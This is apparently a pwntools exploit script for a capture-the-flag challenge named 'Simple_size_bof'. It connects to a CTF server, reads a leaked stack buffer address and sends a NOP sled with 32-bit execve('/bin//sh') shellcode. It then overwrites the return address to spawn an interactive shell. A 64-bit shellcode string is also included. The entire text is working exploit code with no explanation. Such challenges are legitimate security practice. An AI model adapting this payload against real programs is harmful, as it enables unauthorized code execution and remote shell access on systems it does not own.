from pwn import *

r = remote("ctf.j0n9hyun.xyz", 3006)

# r = process("./Simple_size_bof")


shellcode32 = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"
shellcode64 = b"\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05"




r.recvuntil("Data : ")

r.sendline("1")


buf_addr = int(r.recvuntil(":")[:-1], 16)

r.sendline("y")

# esp-0x88

payload  = b""
payload += b"\x90" * 50
payload += shellcode32
payload += b"\x90" * (0x88-50-len(shellcode32))
payload += b"\x90" * 4
payload += p32(buf_addr)

r.sendline(payload)

r.interactive()
